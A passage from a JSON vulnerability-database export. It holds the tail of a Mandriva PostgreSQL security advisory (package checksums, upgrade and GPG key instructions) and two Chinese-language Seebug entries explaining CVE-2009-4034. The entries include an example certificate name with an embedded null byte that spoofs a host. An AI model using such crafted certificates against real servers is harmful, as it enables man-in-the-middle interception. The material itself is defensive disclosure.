2009.1/i586/postgresql8.3-pltcl-8.3.9-0.1mdv2009.1.i586.rpm\r\n db31dcac659eed1a48ee714125c61e78 2009.1/i586/postgresql8.3-server-8.3.9-0.1mdv2009.1.i586.rpm \r\n be8198d19ff2854fcdb5bde0e1654fbf 2009.1/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n c803bc340e21af79f5745df0fee8aead 2009.1/x86_64/lib64ecpg8.3_6-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 616b2b6f79a848fe57410af986c81bda 2009.1/x86_64/lib64pq8.3_5-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 877e5894da539e59805469d16dfda370 2009.1/x86_64/postgresql8.3-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n be3ece7cf5ae31d25dc365389b4e8334 2009.1/x86_64/postgresql8.3-contrib-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n c58f7bf0768b22f5ff229c5cfd4c5f52 2009.1/x86_64/postgresql8.3-devel-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n f3252fd034dcf0a47552b78439fccd4a 2009.1/x86_64/postgresql8.3-docs-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 1b425723f71982812ebf429188cb88da 2009.1/x86_64/postgresql8.3-pl-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 5b463c7748dcc5fae7b1e7443ee75694 2009.1/x86_64/postgresql8.3-plperl-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 70d521df18f5fbfffe7073b95a614ff8 2009.1/x86_64/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 33a607815a4da55a66101fd13062477e 2009.1/x86_64/postgresql8.3-plpython-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 508aae591f0f59aecde2f4212416a45c 2009.1/x86_64/postgresql8.3-pltcl-8.3.9-0.1mdv2009.1.x86_64.rpm\r\n 8b8f650803166b84ba3a3ff4c538ab89 2009.1/x86_64/postgresql8.3-server-8.3.9-0.1mdv2009.1.x86_64.rpm \r\n be8198d19ff2854fcdb5bde0e1654fbf 2009.1/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2010.0:\r\n 1869824366c51ebb0b55055426bd2c53 2010.0/i586/libecpg8.4_6-8.4.2-0.1mdv2010.0.i586.rpm\r\n 2bb29a6b0aaa2d556b6c9d5b86a6fac2 2010.0/i586/libpq8.4_5-8.4.2-0.1mdv2010.0.i586.rpm\r\n 234ea96d6f15028e48fb4d67ba8e3dc0 2010.0/i586/postgresql8.4-8.4.2-0.1mdv2010.0.i586.rpm\r\n c044f451d83daa297d1b6bea592c5759 2010.0/i586/postgresql8.4-contrib-8.4.2-0.1mdv2010.0.i586.rpm\r\n 33167e61bf2e5f8132e581306fb3f9b3 2010.0/i586/postgresql8.4-devel-8.4.2-0.1mdv2010.0.i586.rpm\r\n 52c063f6a31ef49b87fe70227e1cc7a1 2010.0/i586/postgresql8.4-docs-8.4.2-0.1mdv2010.0.i586.rpm\r\n dc75e2ebbab59312d6c1a491b6393f91 2010.0/i586/postgresql8.4-pl-8.4.2-0.1mdv2010.0.i586.rpm\r\n a44bac65b39698446f4d066f77cd3085 2010.0/i586/postgresql8.4-plperl-8.4.2-0.1mdv2010.0.i586.rpm\r\n 9537965ff95b6d6c62be3df17567f6c9 2010.0/i586/postgresql8.4-plpgsql-8.4.2-0.1mdv2010.0.i586.rpm\r\n 32b66a3d2d191bf52ad1770ce92a24bd 2010.0/i586/postgresql8.4-plpython-8.4.2-0.1mdv2010.0.i586.rpm\r\n a45380a8bc2072792ab52042db3a837c 2010.0/i586/postgresql8.4-pltcl-8.4.2-0.1mdv2010.0.i586.rpm\r\n b99ffb5c3cbb7266b63986b075b0eb95 2010.0/i586/postgresql8.4-server-8.4.2-0.1mdv2010.0.i586.rpm \r\n 7b23c6c695cbf9cf78d105f6bf7fc80f 2010.0/SRPMS/postgresql8.4-8.4.2-0.1mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n 864f7b0ab419b1c08fdbff5af593a9e3 2010.0/x86_64/lib64ecpg8.4_6-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 707a9ed081a46bea0cec38bd2bfe3561 2010.0/x86_64/lib64pq8.4_5-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n e3aa48ed1d6da44aaf791be57619043d 2010.0/x86_64/postgresql8.4-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 874e5a9ab5757e0d9c509eee102c0dc2 2010.0/x86_64/postgresql8.4-contrib-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 90627e1bdc5988d3a78ee16491a27148 2010.0/x86_64/postgresql8.4-devel-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n cf905e15179fe18fa68ae02f35713139 2010.0/x86_64/postgresql8.4-docs-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 8e6957a4ca67801131ee70dbe4f3639a 2010.0/x86_64/postgresql8.4-pl-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 1b1e5de5c77a30672ea9bba9d49d7bed 2010.0/x86_64/postgresql8.4-plperl-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n b87c3d4cd820d21eac3e66559d773508 2010.0/x86_64/postgresql8.4-plpgsql-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n cfcaf767fb6135169e3fb01704e2831e 2010.0/x86_64/postgresql8.4-plpython-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n fd216fa6f5ecb1fa1d8f6429396b4142 2010.0/x86_64/postgresql8.4-pltcl-8.4.2-0.1mdv2010.0.x86_64.rpm\r\n 9c86fd1c896343e5c48b76aed566f8c8 2010.0/x86_64/postgresql8.4-server-8.4.2-0.1mdv2010.0.x86_64.rpm \r\n 7b23c6c695cbf9cf78d105f6bf7fc80f 2010.0/SRPMS/postgresql8.4-8.4.2-0.1mdv2010.0.src.rpm\r\n\r\n Corporate 3.0:\r\n 8a71295ef109fe3ab7260170384c0ce7 corporate/3.0/i586/libecpg3-7.4.27-0.1.C30mdk.i586.rpm\r\n 11ef4350d665b4b2ef2fd926bd560aa8 corporate/3.0/i586/libecpg3-devel-7.4.27-0.1.C30mdk.i586.rpm\r\n 30c8a894b12b223ad491abd4547c1fd7 corporate/3.0/i586/libpgtcl2-7.4.27-0.1.C30mdk.i586.rpm\r\n 0fa521cc9af217d927ca79c91b0c9eae corporate/3.0/i586/libpgtcl2-devel-7.4.27-0.1.C30mdk.i586.rpm\r\n 3672fefda6db5e828c7d939a27314b38 corporate/3.0/i586/libpq3-7.4.27-0.1.C30mdk.i586.rpm\r\n 9a2ba43d5dc9593ca1bbab4647208080 corporate/3.0/i586/libpq3-devel-7.4.27-0.1.C30mdk.i586.rpm\r\n 2247db07ed8b627fbfc35ac648c2a5df corporate/3.0/i586/postgresql-7.4.27-0.1.C30mdk.i586.rpm\r\n e616a70f043ff0b0482e87d56a1019cd corporate/3.0/i586/postgresql-contrib-7.4.27-0.1.C30mdk.i586.rpm\r\n 08f9f7e7f8fb429cf0c77cfa7eda23d3 corporate/3.0/i586/postgresql-devel-7.4.27-0.1.C30mdk.i586.rpm\r\n 6d3b0ed2ba2b362ac09db9c4ae07b9e2 corporate/3.0/i586/postgresql-docs-7.4.27-0.1.C30mdk.i586.rpm\r\n 69b5e9674499b805b8e27bb6c348feec corporate/3.0/i586/postgresql-jdbc-7.4.27-0.1.C30mdk.i586.rpm\r\n 392426960dd9831613903d460af31b80 corporate/3.0/i586/postgresql-pl-7.4.27-0.1.C30mdk.i586.rpm\r\n c266e60a60a5c438dddd9fc3a9e86415 corporate/3.0/i586/postgresql-server-7.4.27-0.1.C30mdk.i586.rpm\r\n 7195e1843ccacf58dd3a8e6888f52687 corporate/3.0/i586/postgresql-tcl-7.4.27-0.1.C30mdk.i586.rpm\r\n d5a7dacb4bbb6d35d0eac00f8fb3fe8f corporate/3.0/i586/postgresql-test-7.4.27-0.1.C30mdk.i586.rpm \r\n 72f69a2d5c5b94cae7b2e9c38c193125 corporate/3.0/SRPMS/postgresql-7.4.27-0.1.C30mdk.src.rpm\r\n\r\n Corporate 3.0/X86_64:\r\n ca3ea7496d9340c6bc7466e478a821ff corporate/3.0/x86_64/lib64ecpg3-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 0ede7c61f0595bff37777971a2e2d3ac corporate/3.0/x86_64/lib64ecpg3-devel-7.4.27-0.1.C30mdk.x86_64.rpm\r\n a798bef9e8f689aed42f1317f59fb189 corporate/3.0/x86_64/lib64pgtcl2-7.4.27-0.1.C30mdk.x86_64.rpm\r\n c5fbbf4818f054ad11be80dad96c2e2f corporate/3.0/x86_64/lib64pgtcl2-devel-7.4.27-0.1.C30mdk.x86_64.rpm\r\n e89bb5fa7f482af3779d4508ccdc0f90 corporate/3.0/x86_64/lib64pq3-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 43966e84c38f69cf644e05f86bb157b9 corporate/3.0/x86_64/lib64pq3-devel-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 7821bd199a8e957f862d2e6751f9993b corporate/3.0/x86_64/postgresql-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 3b7c354b1438fbf7e5613ec4b9525144 corporate/3.0/x86_64/postgresql-contrib-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 1271e5de07e40e7ef5d0b39ad4593cd8 corporate/3.0/x86_64/postgresql-devel-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 17a2e21ba705128bc6dc234fa9222269 corporate/3.0/x86_64/postgresql-docs-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 284c5e6b3bc707509767df7ec5940915 corporate/3.0/x86_64/postgresql-jdbc-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 0b3d675d0991c98ea6b2a665eb587c29 corporate/3.0/x86_64/postgresql-pl-7.4.27-0.1.C30mdk.x86_64.rpm\r\n 742086f186cd02ce6e010aa5b0efcde4 corporate/3.0/x86_64/postgresql-server-7.4.27-0.1.C30mdk.x86_64.rpm\r\n d5875f42122d0a021b1ae474a3c71de4 corporate/3.0/x86_64/postgresql-tcl-7.4.27-0.1.C30mdk.x86_64.rpm\r\n e4eeed326ce8f6a6cd14d955c9af1c3b corporate/3.0/x86_64/postgresql-test-7.4.27-0.1.C30mdk.x86_64.rpm \r\n 72f69a2d5c5b94cae7b2e9c38c193125 corporate/3.0/SRPMS/postgresql-7.4.27-0.1.C30mdk.src.rpm\r\n\r\n Corporate 4.0:\r\n f16a9d7c219db91a48f05d47fbb25328 corporate/4.0/i586/libecpg5-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 46e5cba337eb64ebd722f1cf20a1bea0 corporate/4.0/i586/libecpg5-devel-8.1.19-0.1.20060mlcs4.i586.rpm\r\n aa1bf8fa60ba634f847ef99743b54509 corporate/4.0/i586/libpq4-8.1.19-0.1.20060mlcs4.i586.rpm\r\n c9b495e705a47e8c657fe486c6a73caa corporate/4.0/i586/libpq4-devel-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 8576e546f41ec07302b09f22b800c2a3 corporate/4.0/i586/postgresql-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 99c18cea6a827b10c4197dea71660714 corporate/4.0/i586/postgresql-contrib-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 7a4ac00898e262a29c945ea24381a02c corporate/4.0/i586/postgresql-devel-8.1.19-0.1.20060mlcs4.i586.rpm\r\n e10dde94402ce28c56d0a59f449b2120 corporate/4.0/i586/postgresql-docs-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 2b0aaa02c58d5f75be11b93663ac2db2 corporate/4.0/i586/postgresql-pl-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 898ffb6afa67a42abd8cbd415f20f12d corporate/4.0/i586/postgresql-plperl-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 750c34d0bd6c1370a10f65b0fe0d042f corporate/4.0/i586/postgresql-plpgsql-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 0e2fae96fe4ae65e119ec57bc62d1c18 corporate/4.0/i586/postgresql-plpython-8.1.19-0.1.20060mlcs4.i586.rpm\r\n ddfb7d5dcb55d11ca58c59072c96ffd8 corporate/4.0/i586/postgresql-pltcl-8.1.19-0.1.20060mlcs4.i586.rpm\r\n 0ff2a52751ddf2c15ab718e378864209 corporate/4.0/i586/postgresql-server-8.1.19-0.1.20060mlcs4.i586.rpm\r\n dbd24a627e161243ace369ed2bd0cb59 corporate/4.0/i586/postgresql-test-8.1.19-0.1.20060mlcs4.i586.rpm \r\n cd1d017d500f3616eb652ad819dcc8eb corporate/4.0/SRPMS/postgresql-8.1.19-0.1.20060mlcs4.src.rpm\r\n\r\n Corporate 4.0/X86_64:\r\n ff727efb618417699e1d702c463c08ff corporate/4.0/x86_64/lib64ecpg5-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n d9d0a5ed50a5ea130ec32fe942f58c90 corporate/4.0/x86_64/lib64ecpg5-devel-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 64c1ae194c06762d74dc69105a16a6d3 corporate/4.0/x86_64/lib64pq4-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 5ff5e5660fa8e69fdabc2ec56fb41f33 corporate/4.0/x86_64/lib64pq4-devel-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n d92641b17c40ac1237651577a716d716 corporate/4.0/x86_64/postgresql-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n c1a90670f7443af7ae03ddd89fe8ff86 corporate/4.0/x86_64/postgresql-contrib-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 81907fd64a64793480a155ce04b7c8c1 corporate/4.0/x86_64/postgresql-devel-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n a1b78b2902098f4e2981deb47c14705f corporate/4.0/x86_64/postgresql-docs-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n e3ed9cee0ba6f35ba20bcc593059dfc9 corporate/4.0/x86_64/postgresql-pl-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n a4302fcb3ff0a03be6eadc2fa87e7772 corporate/4.0/x86_64/postgresql-plperl-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 81df2078a490b8f7944e14947172a3cb corporate/4.0/x86_64/postgresql-plpgsql-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 33e8b703accdaf358014a4f4b9f20edf corporate/4.0/x86_64/postgresql-plpython-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n a7d0b24be375bf699a16d856872ed3b0 corporate/4.0/x86_64/postgresql-pltcl-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n 124bb9309c4bcb6174703c933e81fdf8 corporate/4.0/x86_64/postgresql-server-8.1.19-0.1.20060mlcs4.x86_64.rpm\r\n a63ab9b6d993eb50e5b437592423dfe7 corporate/4.0/x86_64/postgresql-test-8.1.19-0.1.20060mlcs4.x86_64.rpm \r\n cd1d017d500f3616eb652ad819dcc8eb corporate/4.0/SRPMS/postgresql-8.1.19-0.1.20060mlcs4.src.rpm\r\n\r\n Mandriva Enterprise Server 5:\r\n 7954b4d7b6b3ad3a4dc075a63503e1d0 mes5/i586/libecpg8.3_6-8.3.9-0.1mdvmes5.i586.rpm\r\n 1631a58bfb19765fa166f6e507e9799b mes5/i586/libpq8.3_5-8.3.9-0.1mdvmes5.i586.rpm\r\n 643f5cada4cb4dbf53e7931a88be3f33 mes5/i586/postgresql8.3-8.3.9-0.1mdvmes5.i586.rpm\r\n c14326f783c2a1f5b90ea623e00e95bf mes5/i586/postgresql8.3-contrib-8.3.9-0.1mdvmes5.i586.rpm\r\n 4e1c3db6f801090ab60b31028fbfaa18 mes5/i586/postgresql8.3-devel-8.3.9-0.1mdvmes5.i586.rpm\r\n c36fcbf4195dbf7becd7c3dabf81e20b mes5/i586/postgresql8.3-docs-8.3.9-0.1mdvmes5.i586.rpm\r\n 524d653e230fbac674e9ce464d290b89 mes5/i586/postgresql8.3-pl-8.3.9-0.1mdvmes5.i586.rpm\r\n 9877115225ad4463430d7e0bf6debebd mes5/i586/postgresql8.3-plperl-8.3.9-0.1mdvmes5.i586.rpm\r\n 9bf0e1591576271129b01f4f0bd60b9e mes5/i586/postgresql8.3-plpgsql-8.3.9-0.1mdvmes5.i586.rpm\r\n b64538f411412f4025471fcad1ce24c8 mes5/i586/postgresql8.3-plpython-8.3.9-0.1mdvmes5.i586.rpm\r\n 3f9499776b4395c5829c761daa952976 mes5/i586/postgresql8.3-pltcl-8.3.9-0.1mdvmes5.i586.rpm\r\n 2f8625a2f70355715b426be163316c8c mes5/i586/postgresql8.3-server-8.3.9-0.1mdvmes5.i586.rpm \r\n a71b64c6243bc5302fd20a09b6f209a7 mes5/SRPMS/postgresql8.3-8.3.9-0.1mdvmes5.src.rpm\r\n\r\n Mandriva Enterprise Server 5/X86_64:\r\n af91e508191f984255fcca2cc4847dd5 mes5/x86_64/lib64ecpg8.3_6-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 2a9f7ddd1c6b1df8fbaed9f75855d215 mes5/x86_64/lib64pq8.3_5-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 5a99bffb08073b986c113f4e01290acb mes5/x86_64/postgresql8.3-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 34a240a407e23e22fa4fafcacd42aaa4 mes5/x86_64/postgresql8.3-contrib-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 328ffce47393a37b8513ca4db35cfa0e mes5/x86_64/postgresql8.3-devel-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 2813c49a1081e9ba21641ff0221c0282 mes5/x86_64/postgresql8.3-docs-8.3.9-0.1mdvmes5.x86_64.rpm\r\n ae7edc79dfcbe71b63d3cc63002b999e mes5/x86_64/postgresql8.3-pl-8.3.9-0.1mdvmes5.x86_64.rpm\r\n b329ee3b0bf6f225d63967194a9ad1f7 mes5/x86_64/postgresql8.3-plperl-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 3357aeaff40947216df472606af69f92 mes5/x86_64/postgresql8.3-plpgsql-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 2d1643ae72848a853075a348c3e710b1 mes5/x86_64/postgresql8.3-plpython-8.3.9-0.1mdvmes5.x86_64.rpm\r\n e190019db4c20a65fbcb6ec71b87fb73 mes5/x86_64/postgresql8.3-pltcl-8.3.9-0.1mdvmes5.x86_64.rpm\r\n 95397048806b12338bf90c216f93f8c6 mes5/x86_64/postgresql8.3-server-8.3.9-0.1mdvmes5.x86_64.rpm \r\n a71b64c6243bc5302fd20a09b6f209a7 mes5/SRPMS/postgresql8.3-8.3.9-0.1mdvmes5.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niD8DBQFLJ6UdmqjQ0CJFipgRAhI0AKDu7P9IZkttVPb8P6UTShYJa6HLxgCcC6JU\r\nwNWFQRVDjFT4KODLej6slSQ=\r\n=9pvm\r\n-----END PGP SIGNATURE-----", "edition": 1, "reporter": "Securityvulns", "published": "2009-12-15T00:00:00", "title": "[ MDVSA-2009:333 ] postgresql", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:32", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-6600", "CVE-2009-3230", "CVE-2009-4034", "CVE-2009-4136"], "modified": "2009-12-15T00:00:00", "id": "SECURITYVULNS:DOC:22944", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22944", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T18:28:18", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "BUGTRAQ ID: 37334\r\nCVE ID: CVE-2009-4034\r\n\r\nPostgreSQL\u662f\u4e00\u6b3e\u9ad8\u7ea7\u5bf9\u8c61\uff0d\u5173\u7cfb\u578b\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\uff0c\u652f\u6301\u6269\u5c55\u7684SQL\u6807\u51c6\u5b50\u96c6\u3002\r\n\r\nPostgreSQL\u6ca1\u6709\u6b63\u786e\u5730\u9a8c\u8bc1X.509\u8bc1\u4e66\u4e3b\u9898\u7684\u901a\u7528\u540d\u79f0\uff08CN\uff09\u5b57\u7b26\u7684\u57df\u540d\u4e2d\u7684\u7a7a\u5b57\u7b26\uff08\\0\uff09\uff0c\u5728\u5904\u7406\u5305\u542b\u6709\u7a7a\u5b57\u7b26\u7684\u8bc1\u4e66\u5b57\u6bb5\u65f6\u9519\u8bef\u5730\u5c06\u7a7a\u5b57\u7b26\u5904\u7406\u4e3a\u622a\u6b62\u5b57\u7b26\uff0c\u56e0\u6b64\u53ea\u4f1a\u9a8c\u8bc1\u7a7a\u5b57\u7b26\u524d\u7684\u90e8\u5206\u3002\u4f8b\u5982\uff0c\u5bf9\u4e8e\u7c7b\u4f3c\u4e8e\u4ee5\u4e0b\u7684\u540d\u79f0\uff1a\r\n\r\n example.com\\0.haxx.se\r\n\r\n\u8bc1\u4e66\u662f\u53d1\u5e03\u7ed9haxx.se\u7684\uff0c\u4f46PostgreSQL\u9519\u8bef\u7684\u9a8c\u8bc1\u7ed9example.com\uff0c\u8fd9\u5141\u8bb8\u653b\u51fb\u8005\u901a\u8fc7\u5408\u6cd5CA\u6240\u53d1\u5e03\u7684\u7279\u5236\u670d\u52a1\u5668\u8bc1\u4e66\u4f2a\u9020\u6210\u4e3a\u4efb\u610f\u57fa\u4e8eSSL\u7684PostgreSQL\u670d\u52a1\u5668\u6267\u884c\u4e2d\u95f4\u4eba\u653b\u51fb\uff0c\u6216\u7ed5\u8fc7\u9884\u671f\u7684\u5ba2\u6237\u7aef-\u4e3b\u673a\u540d\u9650\u5236\u3002\n\nPostgreSQL PostgreSQL 8.4.x\r\nPostgreSQL PostgreSQL 8.3.x\r\nPostgreSQL PostgreSQL 8.2.x\r\nPostgreSQL PostgreSQL 8.1.x\r\nPostgreSQL PostgreSQL 8.0.x\r\nPostgreSQL PostgreSQL 7.4.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nPostgreSQL\r\n----------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.postgresql.org/about/news.1170\r\n\r\nSun\r\n---\r\nSun\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08Sun-Alert-6909139\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nSun-Alert-6909139\uff1aSecurity Vulnerabilities in PostgreSQL Shipped With Solaris May Allow Escalation of Privileges or Man-in-the-Middle on SSL Connections\r\n\u94fe\u63a5\uff1ahttp://sunsolve.sun.com/search/document.do?assetkey=1-66-274870-1", "reporter": "Root", "published": "2009-12-29T00:00:00", "type": "seebug", "title": "PostgreSQL CA SSL\u8bc1\u4e66\u9a8c\u8bc1\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4034"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-12-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15154", "id": "SSV:15154", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "status": "details"}, {"lastseen": "2017-11-19T18:25:04", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "Bugraq ID: 37334\r\nCVE ID\uff1aCVE-2009-4034\r\n\r\nPostgreSQL\u662f\u4e00\u6b3e\u5bf9\u8c61\u5173\u7cfb\u578b\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\uff0c\u652f\u6301\u6269\u5c55\u7684SQL\u6807\u51c6\u5b50\u96c6\u3002\r\n\u5904\u7406\u90e8\u5206\u8bc1\u4e66\u5b57\u6bb5\u4e2d\u5d4c\u5165\u7a7a\u5b57\u7b26\u7684SSL\u8bc1\u4e66\u5b58\u5728\u9519\u8bef\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4f2a\u9020\u8bc1\u4e66\uff0c\u8fdb\u884c\u4e2d\u95f4\u4eba\u7b49\u653b\u51fb\u3002\r\nSSL\u8bc1\u4e66\u4e2d\u7684\u7a7a\u5b57\u7b26\u53ef\u7528\u4e8e\u4f2a\u9020\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u7aef\u9a8c\u8bc1\uff0c\u53ea\u5f71\u54cd\u542f\u7528\u4e86SSL\uff0c\u6267\u884c\u8bc1\u4e66\u540d\u6821\u9a8c\u6216\u5ba2\u6237\u7aef\u8bc1\u4e66\u9a8c\u8bc1\uff0c\u800c\u5176CA\u5df2\u7ecf\u88ab\u8bf1\u9a97\u53d1\u5e03\u4e86\u975e\u6cd5\u8bc1\u4e66\u7684\u7528\u6237\u3002\n\nPostgreSQL PostgreSQL 8.4.1 \r\nPostgreSQL PostgreSQL 8.3.8 \r\nPostgreSQL PostgreSQL 8.3.6 \r\nPostgreSQL PostgreSQL 8.2.14 \r\nPostgreSQL PostgreSQL 8.2.6 \r\nPostgreSQL PostgreSQL 8.2.4 \r\nPostgreSQL PostgreSQL 8.2.3 \r\nPostgreSQL PostgreSQL 8.2.2 \r\nPostgreSQL PostgreSQL 8.2 \r\nPostgreSQL PostgreSQL 8.1.18 \r\nPostgreSQL PostgreSQL 8.1.11 \r\nPostgreSQL PostgreSQL 8.1.9 \r\nPostgreSQL PostgreSQL 8.1.8 \r\nPostgreSQL PostgreSQL 8.1.5 \r\nPostgreSQL PostgreSQL 8.1.4 \r\nPostgreSQL PostgreSQL 8.1.3 \r\nPostgreSQL PostgreSQL 8.1.1 \r\nPostgreSQL PostgreSQL 8.0.22 \r\nPostgreSQL PostgreSQL 8.0.15 \r\nPostgreSQL PostgreSQL 8.0.13 \r\nPostgreSQL PostgreSQL 8.0.9 \r\nPostgreSQL PostgreSQL 8.0.8 \r\nPostgreSQL PostgreSQL 8.0.7 \r\nPostgreSQL PostgreSQL 8.0.5 \r\nPostgreSQL PostgreSQL 8.0.4 \r\nPostgreSQL PostgreSQL 8.0.3 \r\nPostgreSQL PostgreSQL 8.0.2 \r\nPostgreSQL PostgreSQL 8.0.1 \r\nPostgreSQL PostgreSQL 8.0 \r\nPostgreSQL PostgreSQL 7.4.26 \r\nPostgreSQL PostgreSQL 7.4.19 \r\nPostgreSQL PostgreSQL 7.4.17 \r\nPostgreSQL PostgreSQL 7.4.14 \r\nPostgreSQL PostgreSQL 7.4.13 \r\nPostgreSQL PostgreSQL 7.4.12 \r\nPostgreSQL PostgreSQL 7.4.11 \r\nPostgreSQL PostgreSQL 7.4.10 \r\nPostgreSQL PostgreSQL 7.4.9 \r\nPostgreSQL PostgreSQL 7.4.8 \r\nPostgreSQL PostgreSQL 7.4.7 \r\nPostgreSQL PostgreSQL 7.4.6 \r\nPostgreSQL PostgreSQL 7.4.5 \r\nPostgreSQL PostgreSQL 7.4.4 \r\nPostgreSQL PostgreSQL 7.4.3 \r\nPostgreSQL PostgreSQL 7.4.2 \r\nPostgreSQL PostgreSQL 7.4.1 \r\nPostgreSQL PostgreSQL 7.4 \r\nPostgreSQL PostgreSQL 8.4\r\nPostgreSQL PostgreSQL 8.3\r\nPostgreSQL PostgreSQL 8.1.7\r\nPostgreSQL PostgreSQL 8.0.11\r\nPostgreSQL PostgreSQL 7.4.16\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\n\u7528\u6237\u53ef\u53c2\u8003\u5982\u4e0b\u5b89\u5168\u516c\u544a\u83b7\u5f97\u8865\u4e01\u4fe1\u606f\uff1a\r\nhttp://www.postgresql.org/about/news.1170", "reporter": "Root", "published": "2009-12-17T00:00:00", "type": "seebug", "title": "PostgreSQL\u7a7a\u5b57\u7b26CA SSL\u6574\u6570\u6821\u9a8c\u5b89\u5168\u7ed5\u8fc7\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4034"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2009-12-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15096", "id": "SSV:15096", "sourceData": "", "sourceHref": "", 